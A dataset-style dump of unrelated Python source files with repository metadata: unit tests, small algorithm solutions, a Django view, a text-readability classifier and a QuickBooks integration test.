    def test_textdet_parsers(self):
        parser = WildreceiptTextDetAnnParser(self.root.name)
        samples = parser.parse_files(self.anno, 'train')
        self.assertEqual(len(samples), 1)
        self.assertEqual(osp.basename(samples[0][0]), 'test.jpg')
        instances = samples[0][1]
        self.assertEqual(len(instances), 2)
        self.assertIn('poly', instances[0])
        self.assertIn('text', instances[0])
        self.assertIn('ignore', instances[0])
        self.assertEqual(instances[0]['text'], 'test')
        # label == 0 marks the instance as ignored by the detector parser.
        self.assertEqual(instances[1]['ignore'], True)
    def test_kie_parsers(self):
        parser = WildreceiptKIEAnnParser(self.root.name)
        samples = parser.parse_files(self.anno, 'train')
        self.assertEqual(len(samples), 1)
| [
"islam.bakr.2017@gmail.com"
] | islam.bakr.2017@gmail.com |
733bd03e660fcd79cb70a76ffa9a75004ae3605a | 6858cbebface7beec57e60b19621120da5020a48 | /ply/comment.py | 93db508a01fa2d7c64d4b2e5db56e7acd82ef5a0 | [] | no_license | ponyatov/PLAI | a68b712d9ef85a283e35f9688068b392d3d51cb2 | 6bb25422c68c4c7717b6f0d3ceb026a520e7a0a2 | refs/heads/master | 2020-09-17T01:52:52.066085 | 2017-03-28T07:07:30 | 2017-03-28T07:07:30 | 66,084,244 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 77 | py | def t_COMMENT(t):
r'\#.*'
pass
# No return value. Token discarded | [
"dponyatov@gmail.com"
] | dponyatov@gmail.com |
2bb760da30a8595078e7478130aaa509aa687334 | d9a22d4dcdfc0c28176c0e8afd784b30d275597e | /test_suite/unit_tests/_pipe_control/test_pipes.py | 19956b94af0d81e497f8ddcfe27054bd39176ce1 | [] | no_license | jlec/relax | fda1b3ff77be0afc21c2e6cc52348ae7635cd07a | c317326ddeacd1a1c608128769676899daeae531 | refs/heads/master | 2016-09-08T00:27:57.256090 | 2015-02-10T12:24:55 | 2015-02-10T12:24:55 | 30,596,131 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,472 | py | ###############################################################################
# #
# Copyright (C) 2007-2014 Edward d'Auvergne #
# #
# This file is part of the program relax (http://www.nmr-relax.com). #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
# relax module imports.
from data_store import Relax_data_store; ds = Relax_data_store()
from pipe_control import pipes
from pipe_control.reset import reset
from lib.errors import RelaxError, RelaxNoPipeError, RelaxPipeError
from test_suite.unit_tests.base_classes import UnitTestCase
class Test_pipes(UnitTestCase):
"""Unit tests for the functions of the 'pipe_control.pipes' module."""
def setUp(self):
"""Set up for all the data pipe unit tests."""
# Add a data pipe to the data store.
ds.add(pipe_name='orig', pipe_type='mf')
# Add a single object to the 'orig' data pipe.
ds['orig'].x = 1
# Add a single object to the single spin system of the 'orig' data pipe.
ds['orig'].mol[0].res[0].spin[0].num = 1
# Add an empty data pipe (for the 'eliminate_unused_pipes' test).
ds.add(pipe_name='empty', pipe_type='mf')
# Set the current pipe to the 'orig' data pipe.
pipes.switch('orig')
def test_copy(self):
"""Test the copying of a data pipe.
The function tested is pipe_control.pipes.copy().
"""
# Copy the 'orig' data pipe to the 'new' data pipe.
pipes.copy('orig', 'new')
# Test that the new data pipe exists.
self.assert_('new' in ds)
# Test that the new data pipe has the object 'x' and that its value is 1.
self.assertEqual(ds['new'].x, 1)
# Change the value of x.
ds['new'].x = 2
# Test that the two values are different.
self.assert_(ds['orig'].x != ds['new'].x)
# Test that the new data pipe has the object 'mol[0].res[0].spin[0].num' and that its value is 1.
self.assertEqual(ds['new'].mol[0].res[0].spin[0].num, 1)
# Change the spin system number.
ds['new'].mol[0].res[0].spin[0].num = 2
# Test that the original spin system number hasn't changed.
self.assertEqual(ds['orig'].mol[0].res[0].spin[0].num, 1)
def test_copy_current(self):
"""Test the copying of current data pipe.
The function tested is pipe_control.pipes.copy().
"""
# Copy the 'orig' data pipe to the 'new' data pipe.
pipes.copy(pipe_to='new')
# Test that the new data pipe exists.
self.assert_('new' in ds)
# Test that the new data pipe has the object 'x' and that its value is 1.
self.assertEqual(ds['new'].x, 1)
# Change the value of x.
ds['new'].x = 2
# Test that the two values are different.
self.assert_(ds['orig'].x != ds['new'].x)
# Test that the new data pipe has the object 'mol[0].res[0].spin[0].num' and that its value is 1.
self.assertEqual(ds['new'].mol[0].res[0].spin[0].num, 1)
# Change the spin system number.
ds['new'].mol[0].res[0].spin[0].num = 2
# Test that the original spin system number hasn't changed.
self.assertEqual(ds['orig'].mol[0].res[0].spin[0].num, 1)
def test_copy_fail(self):
"""Test the failure of the copying of data pipes when the data pipe to copy to already exists.
The function tested is pipe_control.pipes.copy()
"""
# Assert that a RelaxPipeError occurs when the data pipe to copy data to already exists.
self.assertRaises(RelaxPipeError, pipes.copy, 'orig', 'empty')
def test_creation(self):
"""Test the creation of a data pipe.
The function used is pipe_control.pipes.create().
"""
# Create a new model-free data pipe.
name = 'new'
pipes.create(name, 'mf')
# Test that the data pipe exists.
self.assert_(name in ds)
# Test that the current pipe is the new pipe.
self.assertEqual(pipes.cdp_name(), name)
def test_creation_fail(self):
"""Test the failure of the creation of a data pipe (by supplying an incorrect pipe type).
The function used is pipe_control.pipes.create().
"""
# Assert that a RelaxError occurs when the pipe type is invalid.
self.assertRaises(RelaxError, pipes.create, 'new', 'x')
def test_current(self):
"""Get the current data pipe.
The function used is pipe_control.pipes.cdp_name().
"""
# Test the current pipe.
self.assertEqual(pipes.cdp_name(), 'orig')
def test_deletion(self):
"""Test the deletion of a data pipe.
The function tested is pipe_control.pipes.delete()
"""
# Set the current pipe to the 'orig' data pipe.
name = 'orig'
pipes.switch(name)
# Delete the 'orig' data pipe.
pipes.delete(name)
# Test that the data pipe no longer exists.
self.assert_(name not in ds)
# Test that the current pipe is None (as the current pipe was deleted).
self.assertEqual(pipes.cdp_name(), None)
def test_deletion_fail(self):
"""Test the failure of the deletion of a data pipe (by suppling a non-existant data pipe).
The function tested is pipe_control.pipes.delete()
"""
# Assert that a RelaxNoPipeError occurs when the data pipe does not exist.
self.assertRaises(RelaxNoPipeError, pipes.delete, 'x')
def test_switch(self):
"""Test the switching of the current data pipe.
The function tested is pipe_control.pipes.switch().
"""
# Switch to the 'orig' data pipe.
pipes.switch('orig')
# Test the current data pipe.
self.assertEqual(pipes.cdp_name(), 'orig')
# Switch to the 'empty' data pipe.
pipes.switch('empty')
# Test the current data pipe.
self.assertEqual(pipes.cdp_name(), 'empty')
    def test_switch_fail(self):
        """Test the failure of switching to a non-existent data pipe.

        The function used is pipe_control.pipes.switch().
        """
        # Assert that a RelaxNoPipeError occurs when the target pipe does not
        # exist ('x' is a pipe name here, not a pipe type).
        self.assertRaises(RelaxNoPipeError, pipes.switch, 'x')
    def test_test(self):
        """The throwing of RelaxNoPipeError when the pipe does not exist.

        The function tested is pipe_control.pipes.check_pipe().
        """
        # The following should do nothing as the pipes exist.
        pipes.check_pipe()
        pipes.check_pipe('orig')
        pipes.check_pipe('empty')
        # Assert that a RelaxNoPipeError occurs when the pipe doesn't exist.
        self.assertRaises(RelaxNoPipeError, pipes.check_pipe, 'x')
        # Reset relax, wiping all data pipes.
        reset()
        # Now none of the following pipes exist, hence errors should be thrown.
        self.assertRaises(RelaxNoPipeError, pipes.check_pipe)
        self.assertRaises(RelaxNoPipeError, pipes.check_pipe, 'orig')
        self.assertRaises(RelaxNoPipeError, pipes.check_pipe, 'empty')
| [
"bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5"
] | bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5 |
3536260316053a84bfe9507e9c17029afa97708e | 3c9004d310ef124d6eb3872d7e6b02799a4dfbfb | /面向对象/多重继承.py | 33e0fe0390bccf03408e5f7415b2fa8bdc15166c | [] | no_license | iguess1220/python | c2eae6011a4806e4a7f68ef9351dbffc2d9635f3 | 3be7fd4e130247715bc89525b3ab66a755863480 | refs/heads/master | 2020-04-08T22:33:01.218992 | 2018-12-18T08:09:23 | 2018-12-18T08:09:23 | 112,563,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | class Animal:
pass
class Mammal(Animal):
    """A mammal: an animal that feeds on milk."""
    def body(self):
        print("eat milk")
class Bird(Animal):
    """A bird: an animal with wings."""
    def body(self):
        # "有翅膀" means "has wings"; the printed text is kept verbatim.
        print("有翅膀")
class Runable(Animal):
    """Mixin for animals that can run.

    NOTE: the name misspells "Runnable"; it is kept as-is because callers
    below inherit from this exact name.
    """
    def run(self):
        print("running")
class Flyable(Animal):
    """Mixin for animals that can fly."""
    def fly(self):
        print("fly")
class Bat(Mammal,Flyable):
    """A bat: demonstrates multiple inheritance (a flying mammal)."""
    pass
# Demo: a bat inherits fly() from Flyable.
b = Bat()
b.fly()
class tuoniao(Bird,Runable,Flyable):
    # "tuoniao" (鸵鸟) means ostrich: a bird that both runs and, per the
    # class hierarchy here, nominally flies.
    pass
c = tuoniao()
c.run()
# body() is resolved on Bird first per the MRO.
c.body()
| [
"17710890916@163.com"
] | 17710890916@163.com |
b9c1b57faec38343cc0531c69ae241bf31fc54fd | bc8a0e87417add0325c9124ee847efaf88d2daa1 | /PycharmProjects/week5/coursera_forms/formdummy/views.py | 1409ed3df327284e005f02b1e0ab417cf904ce4c | [] | no_license | Ivanlasich/python | f0034426ea91d956d4d47a0a41e099785a6ddf1a | d8ed501537581f01d07733bd81911d0f523d7bfc | refs/heads/master | 2022-12-12T21:06:46.473608 | 2019-12-08T19:03:41 | 2019-12-08T19:03:41 | 226,704,894 | 0 | 0 | null | 2022-12-08T02:40:00 | 2019-12-08T17:28:07 | Python | UTF-8 | Python | false | false | 242 | py | from django.shortcuts import render
from django.views import View
import requests
class FormDummyView(View):
    """Dummy form view: calls the GitHub events API, then renders the form page."""

    def get(self, request):
        """Handle GET: perform the (unused) API request and render form.html."""
        # The HTTP response was bound to an unused local in the original;
        # the call is kept only for its network side effect.
        requests.get('https://api.github.com/events')
        return render(request, 'form.html', {})
| [
"ivanlazichny@gmail.com"
] | ivanlazichny@gmail.com |
3bc8e2ac6257c4f60d8e100e9230c5b365aa231f | c83fe2005a44b436a8be1e0787834a8a93b2024b | /scripts/dynamic_programming/longest_common_substring.py | 6c200f0878b158a8bb9db30e056545648c26fb10 | [] | no_license | wulfebw/algorithms | 9eb0bacd8a7851d28beecb608a895925e26f543b | cbae6aba464a021ada842adb4eaed9dbd16dc0f2 | refs/heads/master | 2021-01-19T02:28:12.666777 | 2019-05-02T02:52:08 | 2019-05-02T02:52:08 | 49,041,959 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | '''
The key difference between finding the longest common substring and the longest common subsequence is that in the substring case a mismatch resets the running count to zero, whereas with the subsequence it does not.
'''
import numpy as np
def lcs(a,b):
    """Return the length of the longest common substring of *a* and *b*.

    Classic O(len(a) * len(b)) dynamic programme: table[r+1, c+1] holds the
    length of the common suffix ending at a[r] and b[c]; the answer is the
    largest entry anywhere in the table.
    """
    rows, cols = len(a), len(b)
    table = np.zeros((rows + 1, cols + 1))
    for r in range(rows):
        for c in range(cols):
            if a[r] == b[c]:
                # Extend the common suffix by one character.
                table[r + 1, c + 1] = table[r, c] + 1
    return int(table.max())
if __name__ == '__main__':
    # Smoke test: for each pair, print the expected answer, then the
    # computed one, then a blank separator line.
    inputs = [
        ('GeeksforGeeks', 'GeeksQuiz'),
        ('abcdxyz', 'xyzabcd'),
        ('zxabcdezy', 'yzabcdezx'),
        ('aabbbccccddd', 'dddddbbbbbbaaaaacccc')
    ]
    # Expected longest-common-substring lengths, aligned with `inputs`.
    expect = [
        5,
        4,
        6,
        4
    ]
    for (i,e) in zip(inputs, expect):
        print(e)
        print(lcs(*i))
        print()
| [
"wulfebw@stanford.edu"
] | wulfebw@stanford.edu |
5fecb3d42317d7666bb4cf7e590626bd078063ef | d7998eacdd2ecd9623b520ec1c36524a2c3ab827 | /conwhat/__main__.py | 86cee1f77db13de34af7a5a1156f2579c0a8759e | [
"BSD-3-Clause"
] | permissive | raamana/ConWhAt | d50674e3d790704d8105eb69dfa96e8164c0c402 | 098ae8088f6d320ed414355be3d31a65b8bf43de | refs/heads/master | 2021-08-20T00:35:54.446433 | 2017-11-27T20:17:13 | 2017-11-27T20:17:13 | 112,232,400 | 0 | 0 | null | 2017-11-27T18:26:35 | 2017-11-27T18:26:34 | null | UTF-8 | Python | false | false | 488 | py |
def main():
    """Command-line entry point.

    The CLI is not implemented; this always raises NotImplementedError
    pointing users at the Python API instead.
    """
    message = ('The command line interface for ConWhAt is not currently supported. '
               'Please use it via API in a script or jupyter notebook. \n'
               'Example usages : \n'
               'from conwhat import StreamConnAtlas \n'
               'from conwhat import VolConnAtlas \n'
               '')
    raise NotImplementedError(message)
if __name__ == '__main__':
    # Delegate to main(), which currently always raises NotImplementedError.
    main()
"raamana@gmail.com"
] | raamana@gmail.com |
f00f2c84d5ce3a1e7902935d2bd5bc439c1b790b | 59212f32b5b3a274fde0875101b37aafe72891f1 | /crawller/selenium_base/classifier.py | 4da4ec8aaf59ec25d2fcb3bff2b7ea2920d5af49 | [] | no_license | afcarl/rehabilitation | b2dd1626deaa606469d7150982f130a2272dd3b0 | 67c6719d805201e0c9ee97fe9130398a9b93881a | refs/heads/master | 2020-03-22T09:59:09.623992 | 2017-02-03T01:06:05 | 2017-02-03T01:06:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,126 | py | from sklearn.feature_extraction.text import CountVectorizer
import json
from sklearn import svm
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
import random
from nltk.tokenize import sent_tokenize, word_tokenize
from functools import reduce
import numpy as np
from sklearn.feature_selection import SelectFromModel
from sklearn.feature_selection import chi2
from sklearn.feature_selection import SelectKBest
from sklearn import tree
from sklearn import linear_model
def get_dataset_stat_health():
    """Build per-grade readability features from health.txt.

    health.txt holds a JSON list of records mapping grade labels (e.g. "2L",
    "MAX") to a text sample.  For every record, the grades are ranked
    numerically ("MAX" last) and each text contributes one feature vector:
    [average words per sentence, average characters per word].

    Returns a dict with parallel lists:
      data   -- the feature vectors
      target -- the 0-based sort rank of each grade within its record
    """
    dataset = {}
    dataset["data"] = []
    dataset["target"] = []
    # Close the file handle deterministically (the original leaked it), and
    # avoid shadowing the builtin `list`.
    with open("health.txt", "r") as handler:
        records = json.load(handler)
    grades = []
    for pairs in records:
        # Collect the numeric grade levels; 99999 is a sentinel that makes
        # "MAX" sort after every real grade.
        for grade, text in pairs.items():
            if grade == "MAX":
                grades.append(99999)
            else:
                grades.append(int(grade[0:-1]))
        grades.sort()
        idx = 0
        for grade in grades:
            # Rebuild the original key ("<n>L" or "MAX") to look the text up.
            if grade == 99999:
                gradex = "MAX"
            else:
                gradex = "".join([str(grade), "L"])
            text = "".join([pairs[gradex], " "])
            sents = sent_tokenize(text)
            sent_avg_len = 0
            sent_cnt = 1
            word_avg_len = 0
            word_cnt = 1
            for sent in sents:
                # Tokenize each sentence once (the original called
                # word_tokenize twice per sentence).
                words = word_tokenize(sent)
                for word in words:
                    word_avg_len += len(word)
                    word_cnt += 1
                sent_avg_len += len(words)
                sent_cnt += 1
            # NOTE(review): the counters start at 1, so these slightly
            # undershoot the true averages -- kept as-is to preserve the
            # original feature scaling.
            sent_avg_len /= sent_cnt
            word_avg_len /= word_cnt
            dataset["data"].append([sent_avg_len, word_avg_len])
            dataset["target"].append(idx)
            idx += 1
        grades.clear()
    return dataset
def get_dataset_text_health():
    """Load the raw grade-level texts from health.txt.

    health.txt holds a JSON list of records mapping grade labels (e.g. "2L",
    "MAX") to a text sample.  Grades are ranked numerically within each
    record ("MAX" last).

    Returns a dict with parallel lists:
      data   -- each text with a trailing space appended
      target -- the 0-based sort rank of each grade within its record
    """
    dataset = {}
    dataset["data"] = []
    dataset["target"] = []
    # Close the file handle deterministically (the original leaked it), and
    # avoid shadowing the builtin `list`.
    with open("health.txt", "r") as handler:
        records = json.load(handler)
    grades = []
    for pairs in records:
        # 99999 is a sentinel so "MAX" sorts after every numeric grade.
        for grade, text in pairs.items():
            if grade == "MAX":
                grades.append(99999)
            else:
                grades.append(int(grade[0:-1]))
        grades.sort()
        idx = 0
        for grade in grades:
            if grade == 99999:
                gradex = "MAX"
            else:
                gradex = "".join([str(grade), "L"])
            # Append a trailing space to match the stat-feature variant.
            # (A dead, commented-out duplication loop was removed here.)
            dataset["data"].append("".join([pairs[gradex], " "]))
            dataset["target"].append(idx)
            idx += 1
        grades.clear()
    return dataset
def get_sample_dataset():
    """Return a tiny hard-coded toy corpus for quick experiments.

    Twelve 'a'-style samples labelled 1, followed by six 'c'-style samples
    labelled 3.
    """
    class_a = ["a aa", "aa a", "a aaa", "a aaa"]
    class_c = ["c cc", "cc ", "c ", "cc ", "c ", "c "]
    dataset = {
        "data": class_a * 3 + class_c,
        "target": [1] * 12 + [3] * 6,
    }
    return dataset
def get_dataset_text_all():
    """Load every (grade, text) pair from news.txt.

    news.txt holds a JSON list of dicts mapping grade keys to texts.

    Returns a dict with parallel lists: data holds the raw texts and
    target holds the grade keys exactly as stored in the file.
    """
    dataset = {}
    dataset["data"] = []
    dataset["target"] = []
    # Close the file handle deterministically (the original leaked it), and
    # avoid shadowing the builtin `list`.
    with open("news.txt", "r") as handler:
        records = json.load(handler)
    for pairs in records:
        for grade, text in pairs.items():
            dataset["data"].append(text)
            dataset["target"].append(grade)
    return dataset
def get_dataset_stat_all():
    """Build readability features from news.txt.

    For every (grade, text) pair, emits one feature vector
    [average words per sentence, average characters per word] into data,
    with the grade key appended to target.
    """
    dataset = {}
    dataset["data"] = []
    dataset["target"] = []
    # Close the file handle deterministically (the original leaked it), and
    # avoid shadowing the builtin `list`.
    with open("news.txt", "r") as handler:
        records = json.load(handler)
    for pairs in records:
        for grade, text in pairs.items():
            dataset["target"].append(grade)
            text = "".join([text, " "])
            sents = sent_tokenize(text)
            sent_avg_len = 0
            sent_cnt = 1
            word_avg_len = 0
            word_cnt = 1
            for sent in sents:
                # Tokenize each sentence once (the original called
                # word_tokenize twice per sentence).
                words = word_tokenize(sent)
                for word in words:
                    word_avg_len += len(word)
                    word_cnt += 1
                sent_avg_len += len(words)
                sent_cnt += 1
            # NOTE(review): counters start at 1, so these slightly undershoot
            # the true averages -- preserved to keep feature values unchanged.
            sent_avg_len /= sent_cnt
            word_avg_len /= word_cnt
            dataset["data"].append([sent_avg_len, word_avg_len])
    return dataset
dataset1 = get_dataset_text_all()
dataset2 = get_dataset_stat_all()
print("finish get dataset")
# Hyper-parameter grids for the sweep below (Cs is currently unused).
ngrams = [2,3,4,5,6,7]
Cs = [10]
features = [100000, 150000,200000,240000]
# samp_order = random.sample(range(len(y)),len(y))
# X = [X[ind] for ind in samp_order]
# y = [y[ind] for ind in samp_order]
# Disabled branch: fit a single decision tree and export it as a PDF for
# manual interpretation (requires pydotplus/graphviz).
if False:
    import pydotplus
    print("for interpretation")
    # word-level
    count_vect = CountVectorizer(min_df=0, max_df=9999, binary=True, lowercase=True, stop_words=None,
                                 ngram_range=(1, 20))
    X1 = count_vect.fit_transform(dataset1["data"])
    y1 = dataset1["target"]
    # feature-level
    X2 = dataset2["data"]
    y2 = dataset2["target"]
    y = y1
    X1 = X1.todense()
    X = np.append(X1, np.matrix(X2), axis=1)
    #populate col names
    cols = ["UNK"] * X.shape[1]
    for word, idx in count_vect.vocabulary_.items():
        cols[idx] = word
    # The two stat features are appended after the vocabulary columns.
    cols[len(cols) - 1] = "Word Average"
    cols[len(cols) - 2] = "Sentence Average"
    classes = ["grade 2-3", "grade 4-6", "grade 7-8", "grade 9-10", "grade 11-12"]
    clf = tree.DecisionTreeClassifier(criterion = "entropy")
    clf.fit(X, y)
    dot_data = tree.export_graphviz(clf, out_file=None, feature_names=cols, class_names=classes, filled=True, rounded=True, special_characters=True)
    graph = pydotplus.graph_from_dot_data(dot_data)
    graph.write_pdf("tree2.pdf")
# Active branch: grid-search over feature count and n-gram range, scoring a
# decision tree with 10-fold cross-validation.
if True:
    for feature in features:
        for ngram in ngrams:
            # word-level
            count_vect = CountVectorizer(min_df=0, max_df=9999, binary=True, lowercase=True, stop_words=None,
                                         ngram_range=(1, ngram))
            X1 = count_vect.fit_transform(dataset1["data"])
            y1 = dataset1["target"]
            # print("finish", "transform")
            # feature-level
            X2 = dataset2["data"]
            y2 = dataset2["target"]
            y = y1
            # Only reduce dimensionality when the vocabulary exceeds the cap.
            if feature < X1.shape[1]:
                X1 = SelectKBest(chi2, k=feature).fit_transform(X1, y)
            X1 = X1.todense()
            # print("finish", "Kbest")
            X = np.concatenate((X1, np.matrix(X2)), axis=1)
            # print("finish", "append")
            #for c in Cs:
            key = " ".join(["feature", str(feature), "c", str(10), "ngram", str(ngram)])
            try:
                clf = tree.DecisionTreeClassifier()
                # clf = LogisticRegression(multi_class='ovr', C=10)
                # clf = svm.SVC(C=c, kernel='linear')
                scores = cross_val_score(clf, X, y, cv=10, n_jobs=1, verbose=0)
                # Report the mean CV accuracy for this configuration.
                print(key, reduce(lambda x, y: x + y, scores) / len(scores))
            except Exception as exp:
                print("error: ", key, "\t", exp)
| [
"zhaosanqiang916@gmail.com"
] | zhaosanqiang916@gmail.com |
b9b83013d4f1fab6c0ae403a06f74021bb5f9f05 | dec494542217437afa7f38e8703328b25b183cb8 | /999.py | 207d2953c1b147a171c8398e49277b1fa5063386 | [] | no_license | Transi-ent/LeetcodeSolver | ee44c9c4d5bce9f11c079c5b27b4b967790cb5cd | a89e19753666657a6f15c1be589b9b2dbd4b6c84 | refs/heads/master | 2021-04-16T20:37:34.710175 | 2021-02-24T03:51:43 | 2021-02-24T03:51:43 | 249,383,432 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,517 | py | class Solution:
"""
先进行遍历,求出白车所在的位置(Row,Col),
再次进行遍历,查询所在的行和列可以捕获的卒
"""
    def numRookCaptures(self, board: list) -> int:
        """Count the pawns ('p') the white rook ('R') can capture on an
        8x8 board, where bishops ('B') block the rook's line of sight.

        Pass 1 locates the rook at (r, c); pass 2 scans the rook's row and
        column for capturable pawns, one per direction at most.
        """
        r, c = None, None
        flag = False
        # Pass 1: find the rook's coordinates.
        for i in range(8):
            for j in range(8):
                if board[i][j]=="R":
                    r, c = i, j
                    flag = True
                    break
            if flag:
                break
        up, down, left, right = 0,0,0,0
        hasBishop = False
        # Pass 2: single row-major scan.  'up' and 'left' cells are visited
        # moving TOWARDS the rook, so the last piece seen (the one nearest
        # the rook) decides the flag.  'right' and 'down' cells are visited
        # moving AWAY from the rook, so the scan stops at the first bishop.
        for i in range(8):
            for j in range(8):
                if j==c and i<r:
                    # Column cells above the rook: nearest piece wins.
                    if board[i][j]=="B":
                        up = 0
                    elif board[i][j]=='p':
                        up = 1
                elif i==r:
                    if j<c:
                        # Row cells left of the rook: nearest piece wins.
                        if board[i][j]=='p':
                            left = 1
                        elif board[i][j]=="B":
                            left = 0
                    elif j>c:
                        # Row cells right of the rook: a bishop blocks the
                        # rest of the row.
                        if board[i][j]=="B":
                            break
                        elif board[i][j]=='p':
                            right = 1
                elif i>r and j==c:
                    # Column cells below the rook: a bishop ends the column
                    # scan (hasBishop also terminates the outer row loop).
                    if board[i][j]=='B':
                        hasBishop = True
                        break
                    elif board[i][j]=='p':
                        down = 1
            if hasBishop:
                break
        return up+down+left+right
| [
"1305113016@qq.com"
] | 1305113016@qq.com |
8c9cae3aba8d5b6fe82416613e41926a36508ce1 | 38bed8ec0229b2d42ebdb33e09930ba8ee6ba5b7 | /torchvision/prototype/models/depth/__init__.py | 0ff02953c242c42c461c32acfa468735252cf401 | [
"BSD-3-Clause",
"CC-BY-NC-4.0"
] | permissive | pytorch/vision | 10443ac1eddf7a32ecb288fe8f58e28cab2a60a1 | 1f94320d8db8d102214a7dc02c22fa65ee9ac58a | refs/heads/main | 2023-09-06T03:48:02.303020 | 2023-09-04T18:25:36 | 2023-09-04T18:25:36 | 73,328,905 | 15,620 | 8,564 | BSD-3-Clause | 2023-09-14T17:52:49 | 2016-11-09T23:11:43 | Python | UTF-8 | Python | false | false | 21 | py | from . import stereo
| [
"noreply@github.com"
] | pytorch.noreply@github.com |
cfe8be1936ffb48572be726f0bcc6d06589a4f7f | 070b693744e7e73634c19b1ee5bc9e06f9fb852a | /python/problem-bit-manipulation/reverse_bits.py | db3e7500f8dee52f9f70c219edb95dbf38ef56fb | [] | no_license | rheehot/practice | a7a4ce177e8cb129192a60ba596745eec9a7d19e | aa0355d3879e61cf43a4333a6446f3d377ed5580 | refs/heads/master | 2021-04-15T22:04:34.484285 | 2020-03-20T17:20:00 | 2020-03-20T17:20:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | # https://leetcode.com/problems/reverse-bits
# 33.75%
class Solution:
    """Reverse the bits of a 32-bit unsigned integer."""

    # @param n, an integer
    # @return an integer
    def reverseBits(self, n):
        """Return *n* with its 32 bits in reversed order.

        The bit characters are collected least-significant-bit first, so
        joining them yields the binary string of the reversed value.
        """
        # The original left per-iteration debug print() calls in place;
        # they are removed here as leftover debugging output.
        bits = []
        bit = 0x1
        for _ in range(32):
            bits.append('0' if n & bit == 0 else '1')
            bit <<= 1
        return int(''.join(bits), 2)
# Quick self-check against the known LeetCode example pair.
s = Solution()
data = [(43261596, 964176192)]
for n, expected in data:
    real = s.reverseBits(n)
    print('{}, expected {}, real {}, result {}'.format(n, expected, real, expected == real))
| [
"morpheus.0@kakaocorp.com"
] | morpheus.0@kakaocorp.com |
a841c652172a7aa0a01324d759390454a36c21f2 | c7044393f89ffee67f30a277019372506d3b0af4 | /tests/integration/test_billpayment.py | c16f8a530034dc79212393f29a91faa2cace5663 | [
"MIT"
] | permissive | stephanelsmith/python-quickbooks | 66845f54aef86dc43a081dd49345a9c090642433 | 20fd4b6e92fe5a5e8dac43daefb0568f0465b62c | refs/heads/master | 2020-06-17T19:22:15.175039 | 2019-07-09T14:34:44 | 2019-07-09T14:34:44 | 196,022,916 | 0 | 0 | MIT | 2019-07-09T14:16:53 | 2019-07-09T14:16:52 | null | UTF-8 | Python | false | false | 2,408 | py | import os
import unittest
from datetime import datetime
from quickbooks.auth import Oauth1SessionManager
from quickbooks.client import QuickBooks
from quickbooks.objects.account import Account
from quickbooks.objects.bill import Bill
from quickbooks.objects.billpayment import BillPayment, BillPaymentLine, CheckPayment
from quickbooks.objects.vendor import Vendor
class BillPaymentTest(unittest.TestCase):
    """Integration test creating a BillPayment against the QuickBooks sandbox."""

    def setUp(self):
        """Build an OAuth1 session and sandbox client from environment variables."""
        self.session_manager = Oauth1SessionManager(
            sandbox=True,
            consumer_key=os.environ.get('CONSUMER_KEY'),
            consumer_secret=os.environ.get('CONSUMER_SECRET'),
            access_token=os.environ.get('ACCESS_TOKEN'),
            access_token_secret=os.environ.get('ACCESS_TOKEN_SECRET'),
        )
        self.qb_client = QuickBooks(
            session_manager=self.session_manager,
            sandbox=True,
            company_id=os.environ.get('COMPANY_ID')
        )
        # Timestamp-derived suffix so repeated runs don't collide on names.
        self.account_number = datetime.now().strftime('%d%H%M')
        self.name = "Test Account {0}".format(self.account_number)

    def test_create(self):
        """Create a check-type bill payment and verify it round-trips intact."""
        bill_payment = BillPayment()
        bill_payment.PayType = "Check"
        bill_payment.TotalAmt = 200
        bill_payment.PrivateNote = "Private Note"
        vendor = Vendor.all(max_results=1, qb=self.qb_client)[0]
        bill_payment.VendorRef = vendor.to_ref()
        bill_payment.CheckPayment = CheckPayment()
        account = Account.where("AccountSubType = 'Checking'", qb=self.qb_client)[0]
        bill_payment.CheckPayment.BankAccountRef = account.to_ref()
        ap_account = Account.where("AccountSubType = 'AccountsPayable'", qb=self.qb_client)[0]
        bill_payment.APAccountRef = ap_account.to_ref()
        bill = Bill.all(max_results=1, qb=self.qb_client)[0]
        line = BillPaymentLine()
        line.LinkedTxn.append(bill.to_linked_txn())
        line.Amount = 200
        bill_payment.Line.append(line)
        bill_payment.save(qb=self.qb_client)
        query_bill_payment = BillPayment.get(bill_payment.Id, qb=self.qb_client)
        # assertEqual replaces the assertEquals alias, which is deprecated
        # and removed in Python 3.12's unittest.
        self.assertEqual(query_bill_payment.PayType, "Check")
        self.assertEqual(query_bill_payment.TotalAmt, 200.0)
        self.assertEqual(query_bill_payment.PrivateNote, "Private Note")
        self.assertEqual(len(query_bill_payment.Line), 1)
        self.assertEqual(query_bill_payment.Line[0].Amount, 200.0)
| [
"edward.emanuel@gmail.com"
] | edward.emanuel@gmail.com |
b74b3f64c971504ff7beaf4a8b24756ffbbd7933 | a38180435ac5786185c0aa48891c0aed0ab9d72b | /S4/S4 Library/simulation/sims/university/university_telemetry.py | 3d65d5f99c17da1c0b69dc34bea11a7d0f241659 | [
"CC-BY-4.0"
] | permissive | NeonOcean/Environment | e190b6b09dd5dbecba0a38c497c01f84c6f9dc7d | ca658cf66e8fd6866c22a4a0136d415705b36d26 | refs/heads/master | 2022-12-03T13:17:00.100440 | 2021-01-09T23:26:55 | 2021-01-09T23:26:55 | 178,096,522 | 1 | 1 | CC-BY-4.0 | 2022-11-22T20:24:59 | 2019-03-28T00:38:17 | Python | UTF-8 | Python | false | false | 3,176 | py | import build_buy
import services
import sims4.telemetry
import telemetry_helper
# Four-character group/hook codes passed to the telemetry writer below.
TELEMETRY_GROUP_UNIVERSITY = 'UNIV'
